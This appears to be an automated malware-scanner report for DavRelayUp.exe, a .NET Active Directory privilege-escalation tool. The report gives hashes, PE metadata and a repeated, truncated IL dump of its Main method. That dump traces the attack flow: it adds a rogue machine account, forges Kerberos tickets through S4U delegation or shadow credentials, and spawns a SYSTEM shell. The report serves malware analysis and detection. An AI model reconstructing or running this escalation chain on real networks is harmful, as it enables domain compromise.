Suspicious
Suspect

3a85d8a51ff724ce38a02d435e0c0bf5

PE Executable
|
MD5: 3a85d8a51ff724ce38a02d435e0c0bf5
|
Size: 1.06 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Low

Hash
 Hash Value
MD5
3a85d8a51ff724ce38a02d435e0c0bf5
Sha1
bf5f9771fad47b1b19f366b88469b829901d0217
Sha256
84b24071b0229e189f03bc643027a63c582b02f6e96e82d730e12793cfcd9abb
Sha384
c41edf9670ed6128c874e05866fc337048e2edc238c092e8544d4a73f5f01ba927d6ddf3e4dfa44d0d43e49f350fed26
Sha512
be985c41afb2a7a945673f240b977a9fc2a5ede5847d5408a513cde808cd09fef3b4b28de4f7952a85e85f6e7e4f101ace36f0c819b594341687568263147fe9
SSDeep
24576:2ZeqOjAlC+9nHLmX63wZSGBI/u0+eW81ATw8FD5S7Ms:2Uhsl99nrmXOFp/HJW8itDR
TLSH
FA35E1392BEC5F09E5BF0735E071491906F2F112A4B2FB9EEE85909E2913B44E821777

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
UPolyX 0.3 -> delikon
File Structure
3a85d8a51ff724ce38a02d435e0c0bf5
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
DavRelayUp.DSInternals.Common.Properties.Resources.resources
bouncycastle.crypto
system.runtime.windowsruntime
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

DavRelayUp.exe
Full Name

DavRelayUp.exe
EntryPoint

System.Void DavRelayUp.Program::Main(System.String[])
Scope Name

DavRelayUp.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

DavRelayUp
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

1210
Main Method

System.Void DavRelayUp.Program::Main(System.String[])
Main IL Instruction Count

676
Main IL

ldstr DavRelayUp - Relaying you to SYSTEM but retro style call System.Void System.Console::WriteLine(System.String) ldarg.0 <null> call System.Void DavRelayUp.Program::ParseArgs(System.String[]) ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase brtrue.s IL_002A: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldarg.0 <null> ldc.i4.1 <null> ldelem.ref <null> call System.Int32 System.Convert::ToInt32(System.String) call System.Void DavRelayUp.KrbSCM::RunSystemProcess(System.Int32) leave.s IL_0029: ret pop <null> leave.s IL_0029: ret ret <null> ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.3 <null> bne.un.s IL_0038: ldsfld System.String DavRelayUp.Options::domain call System.Void DavRelayUp.KrbSCM::Run() ret <null> ldsfld System.String DavRelayUp.Options::domain call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0050: call System.Boolean DavRelayUp.Networking::GetDomainInfo() ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_0058: ldsfld System.String DavRelayUp.Options::domainController call System.Boolean DavRelayUp.Networking::GetDomainInfo() brtrue.s IL_0058: ldsfld System.String DavRelayUp.Options::domainController ret <null> ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_008A: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldsfld System.String DavRelayUp.Options::domainController call System.String DavRelayUp.Networking::GetDCNameFromIP(System.String) stsfld System.String DavRelayUp.Options::domainController ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_008A: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldstr [-] Could not find Domain Controller FQDN From IP. Try specifying the FQDN with --DomainController flag. call System.Void System.Console::WriteLine(System.String) ret <null> ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.1 <null> beq.s IL_009D: call System.Void System.Console::WriteLine() ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_030E: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase call System.Void System.Console::WriteLine() ldsfld System.String DavRelayUp.Options::domain call System.String DavRelayUp.Networking::GetDomainDN(System.String) stsfld System.String DavRelayUp.Options::domainDN ldsfld System.String DavRelayUp.Options::domainController ldsfld System.Int32 DavRelayUp.Options::ldapPort newobj System.Void System.DirectoryServices.Protocols.LdapDirectoryIdentifier::.ctor(System.String,System.Int32) newobj System.Void System.DirectoryServices.Protocols.LdapConnection::.ctor(System.DirectoryServices.Protocols.LdapDirectoryIdentifier) stloc.0 <null> ldsfld System.Boolean DavRelayUp.Options::useSSL brfalse.s IL_00E7: ldloc.0 ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.3 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_ProtocolVersion(System.Int32) ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_SecureSocketLayer(System.Boolean) br.s IL_00FF: ldloc.0 ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Sealing(System.Boolean) ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions System.DirectoryServices.Protocols.LdapConnection::get_SessionOptions() ldc.i4.1 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapSessionOptions::set_Signing(System.Boolean) ldloc.0 <null> callvirt System.Void System.DirectoryServices.Protocols.LdapConnection::Bind() ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0304: call System.Threading.Tasks.Task DavRelayUp.Program::RelayTask() ldsfld System.Boolean DavRelayUp.Options::rbcdCreateNewComputerAccount brfalse IL_02EF: ldloc.0 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_0132: newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() ldc.i4.s 16 call System.String DavRelayUp.Relay.Helpers::RandomPasswordGenerator(System.Int32) stsfld System.String DavRelayUp.Options::rbcdComputerPassword newobj System.Void System.DirectoryServices.Protocols.AddRequest::.ctor() stloc.1 <null> ldloc.1 <null> ldstr CN= ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr ,CN=Computers, ldsfld System.String DavRelayUp.Options::domainDN call System.String System.String::Concat(System.String,System.String,System.String,System.String) callvirt System.Void System.DirectoryServices.Protocols.AddRequest::set_DistinguishedName(System.String) ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr objectClass ldstr Computer newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr SamAccountName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr userAccountControl ldstr 4096 newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr DnsHostName ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.String) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr ServicePrincipalName ldc.i4.4 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr . ldsfld System.String DavRelayUp.Options::domain call System.String System.String::Concat(System.String,System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr HOST/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr RestrictedKrbHost/ ldsfld System.String DavRelayUp.Options::rbcdComputerName call System.String System.String::Concat(System.String,System.String) stelem.ref <null> newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Object[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryAttributeCollection System.DirectoryServices.Protocols.AddRequest::get_Attributes() ldstr unicodePwd call System.Text.Encoding System.Text.Encoding::get_Unicode() ldstr " ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldstr " call System.String System.String::Concat(System.String,System.String,System.String) callvirt System.Byte[] System.Text.Encoding::GetBytes(System.String) newobj System.Void System.DirectoryServices.Protocols.DirectoryAttribute::.ctor(System.String,System.Byte[]) callvirt System.Int32 System.DirectoryServices.Protocols.DirectoryAttributeCollection::Add(System.DirectoryServices.Protocols.DirectoryAttribute) pop <null> ldloc.0 <null> ldloc.1 <null> callvirt System.DirectoryServices.Protocols.DirectoryResponse System.DirectoryServices.Protocols.DirectoryConnection::SendRequest(System.DirectoryServices.Protocols.DirectoryRequest) pop <null> ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] Computer account " stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $" added with password " stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerPassword stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) leave.s IL_02EF: ldloc.0 stloc.2 <null> ldstr [-] Could not add new computer account: call System.Void System.Console::WriteLine(System.String) ldstr [-] ldloc.2 <null> callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) leave IL_07DD: ret ldloc.0 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::domainDN call System.String DavRelayUp.Program::GetObjectSidForComputerName(System.DirectoryServices.Protocols.LdapConnection,System.String,System.String) stsfld System.String DavRelayUp.Options::rbcdComputerSid call System.Threading.Tasks.Task DavRelayUp.Program::RelayTask() callvirt System.Void System.Threading.Tasks.Task::Wait() ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.2 <null> beq.s IL_032B: ldnull ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_07DD: ret ldsfld System.Boolean DavRelayUp.Options::attackDone brfalse IL_07DD: ret ldnull <null> stloc.3 <null> ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.1 <null> bne.un IL_0568: ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.0 <null> stloc.s V_4 ldnull <null> stloc.s V_5 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03A9: ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToUpper() stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr host stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName callvirt System.String System.String::ToLower() stelem.ref <null> dup <null> ldc.i4.3 <null> ldstr . stelem.ref <null> dup <null> ldc.i4.4 <null> ldsfld System.String DavRelayUp.Options::domain callvirt System.String System.String::ToLower() stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_9 ldc.i4.s 18 ldsfld System.String DavRelayUp.Options::rbcdComputerPassword ldloc.s V_9 ldc.i4 4096 call System.String DavRelayUp.Crypto::KerberosPasswordHash(DavRelayUp.Interop/KERB_ETYPE,System.String,System.String,System.Int32) stloc.s V_5 ldc.i4.s 18 stloc.s V_4 br.s IL_03C0: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_03C0: ldsfld System.String DavRelayUp.Options::rbcdComputerName ldsfld System.String DavRelayUp.Options::rbcdComputerPasswordHash stloc.s V_5 ldc.i4.s 23 stloc.s V_4 ldsfld System.String DavRelayUp.Options::rbcdComputerName ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldloc.s V_5 ldloc.s V_4 ldnull <null> ldc.i4.0 <null> ldstr ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.0 <null> ldc.i4.1 <null> ldnull <null> call System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.Boolean,System.String) stloc.s V_6 ldloc.s V_6 brtrue.s IL_03FF: ldloc.s V_6 ret <null> ldloc.s V_6 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_7 ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_044E: ldloc.s V_7 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_7 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_7 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_8 ldloc.s V_8 brtrue.s IL_047D: ldsfld System.Boolean DavRelayUp.Options::verbose ret <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_04E9: ldloc.s V_7 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_8 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_7 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldstr ldloc.s V_8 ldc.i4.0 <null> ldnull <null> call System.Byte[] DavRelayUp.S4U::S4U2Proxy(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,DavRelayUp.KRB_CRED,System.Boolean,System.String) stloc.3 <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse IL_071D: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) br IL_071D: ldc.i4 1500 ldsfld DavRelayUp.Options/RelayAttackType DavRelayUp.Options::relayAttackType ldc.i4.2 <null> bne.un IL_071D: ldc.i4 1500 call System.String System.Environment::get_MachineName() ldstr $ call System.String System.String::Concat(System.String,System.String) ldsfld System.String DavRelayUp.Options::domain ldsfld System.String DavRelayUp.Options::shadowCredCertificate ldsfld System.String DavRelayUp.Options::shadowCredCertificatePassword ldc.i4.s 18 ldnull <null> ldc.i4.0 <null> ldstr ldsfld System.Boolean DavRelayUp.Options::verbose stloc.s V_14 ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldloc.s V_14 ldnull <null> call System.Byte[] DavRelayUp.AskTGT::TGT(System.String,System.String,System.String,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String,System.Boolean,System.String,DavRelayUp.lib.Interop.LUID,System.Boolean,System.Boolean,System.String,System.Boolean,System.String) stloc.s V_11 ldloc.s V_11 brtrue.s IL_05C1: ldloc.s V_11 ret <null> ldloc.s V_11 newobj System.Void DavRelayUp.KRB_CRED::.ctor(System.Byte[]) stloc.s V_12 ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_0610: ldloc.s V_12 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGT for stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr $: stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_12 callvirt System.Byte[] DavRelayUp.KRB_CRED::get_RawBytes() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_12 ldsfld System.String DavRelayUp.Options::impersonateUser ldsfld System.String DavRelayUp.Options::targetSPN ldnull <null> ldc.i4.0 <null> ldstr ldstr ldc.i4.0 <null> ldc.i4.0 <null> ldc.i4.0 <null> ldstr ldc.i4.s 65 ldnull <null> call DavRelayUp.KRB_CRED DavRelayUp.S4U::S4U2Self(DavRelayUp.KRB_CRED,System.String,System.String,System.String,System.Boolean,System.String,System.String,System.Boolean,System.Boolean,System.Boolean,System.String,DavRelayUp.Interop/KERB_ETYPE,System.String) stloc.s V_13 ldloc.s V_13 brtrue.s IL_063F: ldsfld System.Boolean DavRelayUp.Options::verbose ret <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_06AB: ldloc.s V_13 ldc.i4.s 9 newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::rbcdComputerName stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr $@ stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String DavRelayUp.Options::domain stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.7 <null> ldloc.s V_13 callvirt Asn1.AsnElt DavRelayUp.KRB_CRED::Encode() callvirt System.Byte[] Asn1.AsnElt::Encode() call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldloc.s V_13 ldsfld System.String DavRelayUp.Options::targetSPN ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> ceq <null> ldc.i4.0 <null> ceq <null> ldloca.s V_10 initobj DavRelayUp.lib.Interop.LUID ldloc.s V_10 call System.Byte[] DavRelayUp.LSA::SubstituteTGSSname(DavRelayUp.KRB_CRED,System.String,System.Boolean,DavRelayUp.lib.Interop.LUID) stloc.3 <null> ldsfld System.Boolean DavRelayUp.Options::verbose brfalse.s IL_071D: ldc.i4 1500 ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr [+] VERBOSE: Base64 TGS for stelem.ref <null> dup <null> ldc.i4.1 <null> ldsfld System.String DavRelayUp.Options::impersonateUser stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr to stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String DavRelayUp.Options::targetSPN stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : stelem.ref <null> dup <null> ldc.i4.5 <null> ldloc.3 <null> call System.String System.Convert::ToBase64String(System.Byte[]) stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.Void System.Console::WriteLine(System.String) ldc.i4 1500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> beq.s IL_0739: call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() ldsfld System.Boolean DavRelayUp.Options::useCreateNetOnly brfalse IL_07D8: call System.Void DavRelayUp.KrbSCM::Run() call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() ldstr krbscm call System.String System.String::Concat(System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::serviceName call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0778: ldsfld System.String DavRelayUp.Options::serviceCommand ldloc.s V_15 ldstr --ServiceName " ldsfld System.String DavRelayUp.Options::serviceName ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::serviceCommand call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_079C: ldsfld System.String DavRelayUp.Options::netOnlyCommand ldloc.s V_15 ldstr --ServiceCommand " ldsfld System.String DavRelayUp.Options::serviceCommand ldstr " call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_15 ldsfld System.String DavRelayUp.Options::netOnlyCommand brfalse.s IL_07CA: ldloc.s V_15 ldstr [*] --NetOnlyCommand override requested call System.Void System.Console::WriteLine(System.String) ldstr [*] To get the SYSTEM shell, run ' ldloc.s V_15 ldstr ' in context of the created process call System.String System.String::Concat(System.String,System.String,System.String) call System.Void System.Console::WriteLine(System.String) ldsfld System.String DavRelayUp.Options::netOnlyCommand stloc.s V_15 ldloc.s V_15 ldc.i4.0 <null> ldnull <null> ldnull <null> ldnull <null> ldloc.3 <null> call DavRelayUp.lib.Interop.LUID DavRelayUp.Helpers::CreateProcessNetOnly(System.String,System.Boolean,System.String,System.String,System.String,System.Byte[]) pop <null> ret <null> call System.Void DavRelayUp.KrbSCM::Run() ret <null>
Module Name

DavRelayUp.exe
Full Name

DavRelayUp.exe
EntryPoint

System.Void DavRelayUp.Program::Main(System.String[])
Scope Name

DavRelayUp.exe
Scope Type

ModuleDef
Kind

Console
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

DavRelayUp
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

1210
Main Method

System.Void DavRelayUp.Program::Main(System.String[])
Main IL Instruction Count

676
Main IL

ldstr DavRelayUp - Relaying you to SYSTEM but retro style call System.Void System.Console::WriteLine(System.String) ldarg.0 <null> call System.Void DavRelayUp.Program::ParseArgs(System.String[]) ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase brtrue.s IL_002A: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldarg.0 <null> ldc.i4.1 <null> ldelem.ref <null> call System.Int32 System.Convert::ToInt32(System.String) call System.Void DavRelayUp.KrbSCM::RunSystemProcess(System.Int32) leave.s IL_0029: ret pop <null> leave.s IL_0029: ret ret <null> ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.3 <null> bne.un.s IL_0038: ldsfld System.String DavRelayUp.Options::domain call System.Void DavRelayUp.KrbSCM::Run() ret <null> ldsfld System.String DavRelayUp.Options::domain call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0050: call System.Boolean DavRelayUp.Networking::GetDomainInfo() ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_0058: ldsfld System.String DavRelayUp.Options::domainController call System.Boolean DavRelayUp.Networking::GetDomainInfo() brtrue.s IL_0058: ldsfld System.String DavRelayUp.Options::domainController ret <null> ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_008A: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldsfld System.String DavRelayUp.Options::domainController call System.String DavRelayUp.Networking::GetDCNameFromIP(System.String) stsfld System.String DavRelayUp.Options::domainController ldsfld System.String DavRelayUp.Options::domainController call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_008A: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldstr [-] Could not find Domain Controller FQDN From IP. Try specifying the FQDN with --DomainController flag. call System.Void System.Console::WriteLine(System.String) ret <null> ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.1 <null> beq.s IL_009D: call System.Void System.Console::WriteLine() ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase ldc.i4.4 <null> bne.un IL_030E: ldsfld DavRelayUp.Options/PhaseType DavRelayUp.Options::phase call System.Void System.Console::WriteLine() ldsfld System.String DavRelayUp.Options::domain call System.String DavRelayUp.Networking::GetDomainDN(System.String) stsfld System.String DavRelayUp.Options::domainDN ldsfld System.String DavRelayUp.Options::domainController ldsfld System.Int32 DavRelayUp.Options::ldapPort newobj System.Void System.DirectoryServices.Protocols.LdapDirectoryIdentifier::.ctor(System.String,System.Int32) newobj System.Void System.DirectoryServices.Protocols.LdapConnection::.ctor(System.DirectoryServices.Protocols.LdapDirectoryIdentifier) stloc.0 <null> ldsfld System.Boolean DavRelayUp.Options::useSSL brfalse.s IL_00E7: ldloc.0 ldloc.0 <null> callvirt System.DirectoryServices.Protocols.LdapSessionOptions 